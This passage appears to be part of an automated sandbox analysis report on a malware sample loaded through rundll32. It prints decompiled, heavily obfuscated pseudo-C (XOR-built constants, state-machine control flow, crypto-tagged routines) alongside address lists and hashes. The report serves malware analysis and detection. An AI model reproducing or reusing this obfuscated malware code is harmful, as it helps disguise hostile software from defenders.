                                                                                                                                    0x002e0da8
                                                                                                                                    0x002e0da8
                                                                                                                                    0x002e0db6
                                                                                                                                    0x002e0e2e
                                                                                                                                    0x002e0db8
                                                                                                                                    0x002e0dbe
                                                                                                                                    0x002e0df2
                                                                                                                                    0x002e0df6
                                                                                                                                    0x002e0dfb
                                                                                                                                    0x002e0dfe
                                                                                                                                    0x002e0e03
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0dc0
                                                                                                                                    0x002e0dc2
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0dc4
                                                                                                                                    0x002e0dd0
                                                                                                                                    0x002e0dd1
                                                                                                                                    0x002e0dd2
                                                                                                                                    0x002e0dd7
                                                                                                                                    0x002e0dda
                                                                                                                                    0x002e0ddf
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0ddf
                                                                                                                                    0x002e0dc2
                                                                                                                                    0x002e0dbe
                                                                                                                                    0x002e0e30
                                                                                                                                    0x002e0e39
                                                                                                                                    0x002e0e39
                                                                                                                                    0x002e0e07
                                                                                                                                    0x002e0e09
                                                                                                                                    0x002e0e09
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 9^xu$fj$im
                                                                                                                                    • API String ID: 0-3261451082
                                                                                                                                    • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                    • Instruction ID: 106b86b295c5c8065fe74f7e42360a188c44fbd3eabdcfff41b14b20cf9f3653
                                                                                                                                    • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                    • Instruction Fuzzy Hash: ED5149B24183429BC784CF26D88540BBBE0FFD4368F541A1DF49566260D3B5CA59CF97
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D6C49 Relevance: 3.9, Strings: 3, Instructions: 104COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002D6C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v88;
				char _v608;
				void* _t92;
				void* _t96;
				void* _t101;
				void* _t112;
				void* _t113;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t92);
				_v52 = _v52 & 0x00000000;
				_v56 = 0x878462;
				_t113 = _t112 + 0x14;
				_v32 = 0x956791;
				_t101 = 0x1300659;
				_v32 = _v32 + 0xffff68af;
				_v32 = _v32 ^ 0x0094d050;
				_v48 = 0xb6c679;
				_v48 = _v48 * 9;
				_v48 = _v48 ^ 0x0662f925;
				_v16 = 0xd9c762;
				_v16 = _v16 << 1;
				_v16 = _v16 | 0xb4c78449;
				_v16 = _v16 ^ 0xb5f30401;
				_v40 = 0x8b331e;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000c5129;
				_v28 = 0x1269f4;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x0007e996;
				_v44 = 0xabd705;
				_v44 = _v44 ^ 0x9c90d177;
				_v44 = _v44 ^ 0x9c3fe788;
				_v8 = 0x357d72;
				_v8 = _v8 + 0xd90c;
				_v8 = _v8 ^ 0xccfdbdcb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x199e890f;
				_v12 = 0x32e6;
				_v12 = _v12 ^ 0x74a35607;
				_v12 = _v12 | 0x704b9008;
				_v12 = _v12 + 0xffff83aa;
				_v12 = _v12 ^ 0x74eee325;
				_v36 = 0xeddfb6;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0xb77b8cf2;
				_v24 = 0xe2b758;
				_v24 = _v24 << 5;
				_v24 = _v24 * 0x38;
				_v24 = _v24 ^ 0x330719f5;
				_v20 = 0x9236d6;
				_v20 = _v20 | 0x3f0523f5;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000835ca;
				do {
					while(_t101 != 0x1300659) {
						if(_t101 == 0xa264c44) {
							_t96 = E002C9D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
							_t113 = _t113 + 0x10;
							_t101 = 0xbcabc0e;
							continue;
						}
						if(_t101 != 0xbcabc0e) {
							goto L8;
						}
						return E002D6637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
					}
					_t96 = E002C4B61( &_v88, _v32, _v48, _v16);
					_t101 = 0xa264c44;
					L8:
				} while (_t101 != 0x478adce);
				return _t96;
			}























                                                                                                                                    0x002d6c55
                                                                                                                                    0x002d6c58
                                                                                                                                    0x002d6c5b
                                                                                                                                    0x002d6c5e
                                                                                                                                    0x002d6c5f
                                                                                                                                    0x002d6c60
                                                                                                                                    0x002d6c65
                                                                                                                                    0x002d6c6e
                                                                                                                                    0x002d6c75
                                                                                                                                    0x002d6c78
                                                                                                                                    0x002d6c7f
                                                                                                                                    0x002d6c81
                                                                                                                                    0x002d6c8d
                                                                                                                                    0x002d6c99
                                                                                                                                    0x002d6ca4
                                                                                                                                    0x002d6ca7
                                                                                                                                    0x002d6cae
                                                                                                                                    0x002d6cb5
                                                                                                                                    0x002d6cb8
                                                                                                                                    0x002d6cbf
                                                                                                                                    0x002d6cc6
                                                                                                                                    0x002d6ccd
                                                                                                                                    0x002d6cd1
                                                                                                                                    0x002d6cd8
                                                                                                                                    0x002d6cdf
                                                                                                                                    0x002d6ce3
                                                                                                                                    0x002d6cea
                                                                                                                                    0x002d6cf1
                                                                                                                                    0x002d6cf8
                                                                                                                                    0x002d6cff
                                                                                                                                    0x002d6d06
                                                                                                                                    0x002d6d0d
                                                                                                                                    0x002d6d14
                                                                                                                                    0x002d6d18
                                                                                                                                    0x002d6d1f
                                                                                                                                    0x002d6d26
                                                                                                                                    0x002d6d2d
                                                                                                                                    0x002d6d34
                                                                                                                                    0x002d6d3b
                                                                                                                                    0x002d6d42
                                                                                                                                    0x002d6d49
                                                                                                                                    0x002d6d4d
                                                                                                                                    0x002d6d54
                                                                                                                                    0x002d6d5b
                                                                                                                                    0x002d6d63
                                                                                                                                    0x002d6d66
                                                                                                                                    0x002d6d6d
                                                                                                                                    0x002d6d74
                                                                                                                                    0x002d6d7b
                                                                                                                                    0x002d6d7f
                                                                                                                                    0x002d6d86
                                                                                                                                    0x002d6d86
                                                                                                                                    0x002d6d8c
                                                                                                                                    0x002d6dcd
                                                                                                                                    0x002d6dd2
                                                                                                                                    0x002d6dd5
                                                                                                                                    0x00000000
                                                                                                                                    0x002d6dd5
                                                                                                                                    0x002d6d90
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d6db0
                                                                                                                                    0x002d6de5
                                                                                                                                    0x002d6dec
                                                                                                                                    0x002d6dee
                                                                                                                                    0x002d6dee
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: %t$DL&$r}5
                                                                                                                                    • API String ID: 0-2337153543
                                                                                                                                    • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                    • Instruction ID: 202fef910f33b26175dd71cafc0056d17ac2a2eaac3c0b32b68ea241994a123c
                                                                                                                                    • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                    • Instruction Fuzzy Hash: C4413271D0020EEBCF09DFE5D94A8EEBBB1FB48318F208189D41276220D3B54A59CFA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                                      • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                                      • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1958600898-0
                                                                                                                                    • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                    • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                                    • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                    • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D1889 Relevance: 2.8, Strings: 2, Instructions: 278COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E002D1889(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				short _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t323;
				signed int _t334;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t386;
				void* _t387;
				signed int* _t390;

				_t390 =  &_v1680;
				_v1568 = 0xdfec4c;
				_t386 = __ecx;
				_v1564 = 0;
				_t387 = 0xea1969c;
				_v1596 = 0xb94d4f;
				_v1596 = _v1596 >> 2;
				_v1596 = _v1596 ^ 0x002b88ba;
				_v1604 = 0x7820e8;
				_t9 =  &_v1604; // 0x7820e8
				_t337 = 0x3f;
				_v1604 =  *_t9 / _t337;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x0075b154;
				_v1676 = 0xd796f6;
				_v1676 = _v1676 << 7;
				_t338 = 0x1f;
				_v1676 = _v1676 / _t338;
				_v1676 = _v1676 | 0x34dfec15;
				_v1676 = _v1676 ^ 0x37fcd475;
				_v1580 = 0x701ced;
				_t339 = 0x3b;
				_v1580 = _v1580 / _t339;
				_v1580 = _v1580 ^ 0x000eda5b;
				_v1584 = 0x3864f;
				_v1584 = _v1584 | 0xebab6106;
				_v1584 = _v1584 ^ 0xeba3c8dc;
				_v1668 = 0x7d6229;
				_v1668 = _v1668 + 0x90f9;
				_t340 = 0x7d;
				_v1668 = _v1668 * 0xd;
				_v1668 = _v1668 + 0x17d6;
				_v1668 = _v1668 ^ 0x06671cb6;
				_v1652 = 0x8dafad;
				_v1652 = _v1652 + 0xffffa237;
				_v1652 = _v1652 / _t340;
				_v1652 = _v1652 ^ 0xeab94c45;
				_v1652 = _v1652 ^ 0xeabb4144;
				_v1620 = 0x364acf;
				_v1620 = _v1620 + 0xffffd559;
				_v1620 = _v1620 ^ 0x476b0832;
				_v1620 = _v1620 ^ 0x4757dcec;
				_v1660 = 0xdffac8;
				_v1660 = _v1660 | 0xd3f81aab;
				_t341 = 0xd;
				_v1660 = _v1660 / _t341;
				_v1660 = _v1660 + 0x2ca8;
				_v1660 = _v1660 ^ 0x10473906;
				_v1636 = 0xafa95;
				_v1636 = _v1636 | 0x12b9adda;
				_v1636 = _v1636 + 0xca30;
				_t342 = 0x24;
				_v1636 = _v1636 / _t342;
				_v1636 = _v1636 ^ 0x008bc8e6;
				_v1612 = 0xa1b06d;
				_v1612 = _v1612 ^ 0xd927b519;
				_t334 = 0x1c;
				_v1612 = _v1612 / _t334;
				_v1612 = _v1612 ^ 0x07c55aff;
				_v1628 = 0xe475d7;
				_v1628 = _v1628 + 0xf351;
				_v1628 = _v1628 >> 9;
				_v1628 = _v1628 ^ 0x000b149a;
				_v1644 = 0xc98f78;
				_v1644 = _v1644 + 0xa497;
				_v1644 = _v1644 + 0xab0a;
				_v1644 = _v1644 ^ 0x9916dffd;
				_v1644 = _v1644 ^ 0x99d32d23;
				_v1572 = 0xdb2c8b;
				_v1572 = _v1572 ^ 0xa2354bd4;
				_v1572 = _v1572 ^ 0xa2e9b3f6;
				_v1616 = 0x8ac290;
				_v1616 = _v1616 | 0xd6340cba;
				_t343 = 0x17;
				_v1616 = _v1616 / _t343;
				_v1616 = _v1616 ^ 0x095403ec;
				_v1624 = 0xc9b33;
				_v1624 = _v1624 | 0xadec2c36;
				_t344 = 0x23;
				_v1624 = _v1624 / _t344;
				_v1624 = _v1624 ^ 0x04f29945;
				_v1672 = 0xce6284;
				_t345 = 0x1b;
				_v1672 = _v1672 * 0x47;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 | 0xab5418c0;
				_v1672 = _v1672 ^ 0xab589207;
				_v1680 = 0xfb4294;
				_v1680 = _v1680 * 0x56;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 ^ 0x000a896c;
				_v1576 = 0xa0fe48;
				_v1576 = _v1576 / _t345;
				_v1576 = _v1576 ^ 0x000b8e8e;
				_v1608 = 0x915f33;
				_v1608 = _v1608 + 0xfa43;
				_v1608 = _v1608 >> 0xc;
				_v1608 = _v1608 ^ 0x000a30cc;
				_v1648 = 0x21b71b;
				_v1648 = _v1648 ^ 0x78ef874e;
				_v1648 = _v1648 | 0x9c246086;
				_v1648 = _v1648 * 0x4a;
				_v1648 = _v1648 ^ 0x1ce73be6;
				_v1592 = 0x926794;
				_v1592 = _v1592 + 0xffff6f6e;
				_v1592 = _v1592 ^ 0x009c0ed2;
				_v1656 = 0x919083;
				_v1656 = _v1656 / _t334;
				_v1656 = _v1656 >> 2;
				_t346 = 0x67;
				_v1656 = _v1656 / _t346;
				_v1656 = _v1656 ^ 0x0003c4fa;
				_v1664 = 0xb12839;
				_v1664 = _v1664 ^ 0xbcb8295e;
				_v1664 = _v1664 + 0xe70b;
				_v1664 = _v1664 + 0xffffbcc9;
				_v1664 = _v1664 ^ 0xbc0a928f;
				_v1600 = 0x37ff42;
				_v1600 = _v1600 + 0xffff03fd;
				_v1600 = _v1600 >> 3;
				_v1600 = _v1600 ^ 0x000f4750;
				_v1632 = 0xbb4856;
				_v1632 = _v1632 * 0x4e;
				_v1632 = _v1632 | 0xf74fdfff;
				_v1632 = _v1632 ^ 0xff54b7ec;
				_v1640 = 0x73c8d7;
				_v1640 = _v1640 * 0x56;
				_v1640 = _v1640 << 0xb;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x005dc3ee;
				_v1588 = 0xe2f656;
				_t323 = _v1588 * 0x57;
				_v1588 = _t323;
				_v1588 = _v1588 ^ 0x4d200bca;
				while(_t387 != 0x5de06da) {
					if(_t387 == 0xea1969c) {
						_t387 = 0xfa9128f;
						continue;
					} else {
						_t395 = _t387 - 0xfa9128f;
						if(_t387 != 0xfa9128f) {
							L8:
							__eflags = _t387 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E002DDA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
							 *((short*)(E002CB6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
							E002C8969(_v1620,  &_v520, _t395, _v1660, _v1636);
							_push(_v1644);
							_push(_v1628);
							E002C47CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E002DDCF7(_v1612, 0x2c1328, _t395),  &_v520, _v1672, _v1680);
							E002CA8B0(_v1576, _t329, _v1608);
							_t346 = _v1648;
							_t323 = E002CEA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
							_t390 =  &(_t390[0x17]);
							if(_t323 != 0) {
								_t387 = 0x5de06da;
								continue;
							}
						}
					}
					return _t323;
				}
				_push(_v1588);
				_push( &_v1560);
				_push(_t346);
				_push(0);
				_push(0);
				_push(_v1640);
				_t346 = _v1600;
				_push(0);
				_t323 = E002CAB87(_t346, _v1632, __eflags);
				_t390 =  &(_t390[7]);
				_t387 = 0xa8e801c;
				goto L8;
			}



















































                                                                                                                                    0x002d1889
                                                                                                                                    0x002d188f
                                                                                                                                    0x002d18a1
                                                                                                                                    0x002d18a3
                                                                                                                                    0x002d18aa
                                                                                                                                    0x002d18af
                                                                                                                                    0x002d18b7
                                                                                                                                    0x002d18bc
                                                                                                                                    0x002d18c4
                                                                                                                                    0x002d18cc
                                                                                                                                    0x002d18d0
                                                                                                                                    0x002d18d5
                                                                                                                                    0x002d18db
                                                                                                                                    0x002d18e0
                                                                                                                                    0x002d18e8
                                                                                                                                    0x002d18f0
                                                                                                                                    0x002d18f9
                                                                                                                                    0x002d18fe
                                                                                                                                    0x002d1904
                                                                                                                                    0x002d190c
                                                                                                                                    0x002d1914
                                                                                                                                    0x002d1920
                                                                                                                                    0x002d1925
                                                                                                                                    0x002d192b
                                                                                                                                    0x002d1933
                                                                                                                                    0x002d193b
                                                                                                                                    0x002d1943
                                                                                                                                    0x002d194b
                                                                                                                                    0x002d1953
                                                                                                                                    0x002d1960
                                                                                                                                    0x002d1963
                                                                                                                                    0x002d1967
                                                                                                                                    0x002d196f
                                                                                                                                    0x002d1977
                                                                                                                                    0x002d197f
                                                                                                                                    0x002d198f
                                                                                                                                    0x002d1993
                                                                                                                                    0x002d199b
                                                                                                                                    0x002d19a3
                                                                                                                                    0x002d19ab
                                                                                                                                    0x002d19b3
                                                                                                                                    0x002d19bb
                                                                                                                                    0x002d19c3
                                                                                                                                    0x002d19cb
                                                                                                                                    0x002d19d7
                                                                                                                                    0x002d19dc
                                                                                                                                    0x002d19e2
                                                                                                                                    0x002d19ea
                                                                                                                                    0x002d19f2
                                                                                                                                    0x002d19fa
                                                                                                                                    0x002d1a02
                                                                                                                                    0x002d1a0e
                                                                                                                                    0x002d1a11
                                                                                                                                    0x002d1a15
                                                                                                                                    0x002d1a1f
                                                                                                                                    0x002d1a27
                                                                                                                                    0x002d1a35
                                                                                                                                    0x002d1a3a
                                                                                                                                    0x002d1a3e
                                                                                                                                    0x002d1a46
                                                                                                                                    0x002d1a4e
                                                                                                                                    0x002d1a56
                                                                                                                                    0x002d1a5b
                                                                                                                                    0x002d1a63
                                                                                                                                    0x002d1a6b
                                                                                                                                    0x002d1a73
                                                                                                                                    0x002d1a7b
                                                                                                                                    0x002d1a83
                                                                                                                                    0x002d1a8b
                                                                                                                                    0x002d1a93
                                                                                                                                    0x002d1a9b
                                                                                                                                    0x002d1aa3
                                                                                                                                    0x002d1aab
                                                                                                                                    0x002d1ab9
                                                                                                                                    0x002d1abe
                                                                                                                                    0x002d1ac2
                                                                                                                                    0x002d1aca
                                                                                                                                    0x002d1ad2
                                                                                                                                    0x002d1ae0
                                                                                                                                    0x002d1ae5
                                                                                                                                    0x002d1ae9
                                                                                                                                    0x002d1af1
                                                                                                                                    0x002d1b00
                                                                                                                                    0x002d1b01
                                                                                                                                    0x002d1b05
                                                                                                                                    0x002d1b0a
                                                                                                                                    0x002d1b12
                                                                                                                                    0x002d1b1a
                                                                                                                                    0x002d1b27
                                                                                                                                    0x002d1b2b
                                                                                                                                    0x002d1b30
                                                                                                                                    0x002d1b35
                                                                                                                                    0x002d1b3d
                                                                                                                                    0x002d1b4d
                                                                                                                                    0x002d1b51
                                                                                                                                    0x002d1b59
                                                                                                                                    0x002d1b61
                                                                                                                                    0x002d1b69
                                                                                                                                    0x002d1b6e
                                                                                                                                    0x002d1b76
                                                                                                                                    0x002d1b7e
                                                                                                                                    0x002d1b86
                                                                                                                                    0x002d1b93
                                                                                                                                    0x002d1b97
                                                                                                                                    0x002d1b9f
                                                                                                                                    0x002d1ba7
                                                                                                                                    0x002d1baf
                                                                                                                                    0x002d1bb7
                                                                                                                                    0x002d1bc5
                                                                                                                                    0x002d1bc9
                                                                                                                                    0x002d1bd6
                                                                                                                                    0x002d1bde
                                                                                                                                    0x002d1be2
                                                                                                                                    0x002d1bea
                                                                                                                                    0x002d1bf2
                                                                                                                                    0x002d1bfa
                                                                                                                                    0x002d1c02
                                                                                                                                    0x002d1c0a
                                                                                                                                    0x002d1c12
                                                                                                                                    0x002d1c1a
                                                                                                                                    0x002d1c22
                                                                                                                                    0x002d1c27
                                                                                                                                    0x002d1c2f
                                                                                                                                    0x002d1c3c
                                                                                                                                    0x002d1c40
                                                                                                                                    0x002d1c48
                                                                                                                                    0x002d1c50
                                                                                                                                    0x002d1c5d
                                                                                                                                    0x002d1c61
                                                                                                                                    0x002d1c66
                                                                                                                                    0x002d1c6b
                                                                                                                                    0x002d1c73
                                                                                                                                    0x002d1c7b
                                                                                                                                    0x002d1c80
                                                                                                                                    0x002d1c84
                                                                                                                                    0x002d1c8c
                                                                                                                                    0x002d1c9a
                                                                                                                                    0x002d1d93
                                                                                                                                    0x00000000
                                                                                                                                    0x002d1ca0
                                                                                                                                    0x002d1ca0
                                                                                                                                    0x002d1ca6
                                                                                                                                    0x002d1dc6
                                                                                                                                    0x002d1dc6
                                                                                                                                    0x002d1dcc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d1cac
                                                                                                                                    0x002d1cc5
                                                                                                                                    0x002d1cf6
                                                                                                                                    0x002d1cfd
                                                                                                                                    0x002d1d02
                                                                                                                                    0x002d1d0b
                                                                                                                                    0x002d1d4c
                                                                                                                                    0x002d1d5e
                                                                                                                                    0x002d1d7c
                                                                                                                                    0x002d1d80
                                                                                                                                    0x002d1d85
                                                                                                                                    0x002d1d8a
                                                                                                                                    0x002d1d8c
                                                                                                                                    0x00000000
                                                                                                                                    0x002d1d8c
                                                                                                                                    0x002d1d8a
                                                                                                                                    0x002d1ca6
                                                                                                                                    0x002d1ddc
                                                                                                                                    0x002d1ddc
                                                                                                                                    0x002d1d9d
                                                                                                                                    0x002d1da8
                                                                                                                                    0x002d1da9
                                                                                                                                    0x002d1daa
                                                                                                                                    0x002d1dab
                                                                                                                                    0x002d1dac
                                                                                                                                    0x002d1db4
                                                                                                                                    0x002d1db8
                                                                                                                                    0x002d1db9
                                                                                                                                    0x002d1dbe
                                                                                                                                    0x002d1dc1
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: )b}$ x
                                                                                                                                    • API String ID: 0-2724122486
                                                                                                                                    • Opcode ID: 3412619c75ad2c8b5c32f5603486301616cb7bc5ec9dde7f90fdde49d72bf54d
                                                                                                                                    • Instruction ID: 3b4bd2295b50016b2c681a925da495ab3766545c3eab0a3094a4889a0f9eeb1c
                                                                                                                                    • Opcode Fuzzy Hash: 3412619c75ad2c8b5c32f5603486301616cb7bc5ec9dde7f90fdde49d72bf54d
                                                                                                                                    • Instruction Fuzzy Hash: 19D1307150C3819FE368CF20C48A95BFBE2FBD5358F108A2DF29996260D7B58959CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D473C Relevance: 2.7, Strings: 2, Instructions: 233COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                    			E002D473C() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				void* _t225;
				void* _t246;
				intOrPtr _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr* _t259;
				signed int _t260;
				signed int* _t261;

				_t261 =  &_v100;
				_v12 = 0xf244e3;
				_v8 = 0x291d6d;
				_t225 = 0x37f2dd7;
				_t251 = 0;
				_v4 = 0;
				_v68 = 0x555e8d;
				_v68 = _v68 + 0xfffff532;
				_v68 = _v68 | 0x235b50f0;
				_v68 = _v68 ^ 0x235e53ff;
				_v84 = 0xf72ec;
				_v84 = _v84 >> 7;
				_t252 = 0x19;
				_v84 = _v84 / _t252;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x000f09df;
				_v20 = 0xee8389;
				_t253 = 0x51;
				_v20 = _v20 * 0x29;
				_v20 = _v20 ^ 0x2635dc09;
				_v88 = 0xea545e;
				_t30 =  &_v88; // 0xea545e
				_v88 =  *_t30 / _t253;
				_t36 =  &_v88; // 0xea545e
				_t254 = 0x7a;
				_v88 =  *_t36 * 0x1c;
				_v88 = _v88 + 0xc9a8;
				_v88 = _v88 ^ 0x005db592;
				_v24 = 0x448750;
				_v24 = _v24 / _t254;
				_v24 = _v24 ^ 0x000cab3c;
				_v28 = 0x8cea36;
				_v28 = _v28 * 0x38;
				_v28 = _v28 ^ 0x1eda9ad9;
				_v100 = 0x8110ba;
				_v100 = _v100 + 0x3ab9;
				_v100 = _v100 ^ 0x336ca884;
				_v100 = _v100 + 0xffff8c66;
				_v100 = _v100 ^ 0x33e0711c;
				_v64 = 0x5ca85e;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0x000b11ab;
				_v44 = 0x2bb2b6;
				_v44 = _v44 | 0xbbfbcd5f;
				_v44 = _v44 ^ 0xbbf16182;
				_v72 = 0x855f4c;
				_v72 = _v72 ^ 0x87656771;
				_v72 = _v72 * 0x71;
				_v72 = _v72 ^ 0xf9f8e59a;
				_v96 = 0x938339;
				_v96 = _v96 << 8;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xcc040e17;
				_v96 = _v96 ^ 0x50841052;
				_v40 = 0xbe1d32;
				_v40 = _v40 + 0x9b9c;
				_v40 = _v40 ^ 0x00bc2d0e;
				_v56 = 0x9e5686;
				_v56 = _v56 + 0xffffd134;
				_v56 = _v56 + 0xffff1440;
				_v56 = _v56 ^ 0x0091c9b6;
				_v60 = 0xb7e614;
				_v60 = _v60 << 3;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00065aea;
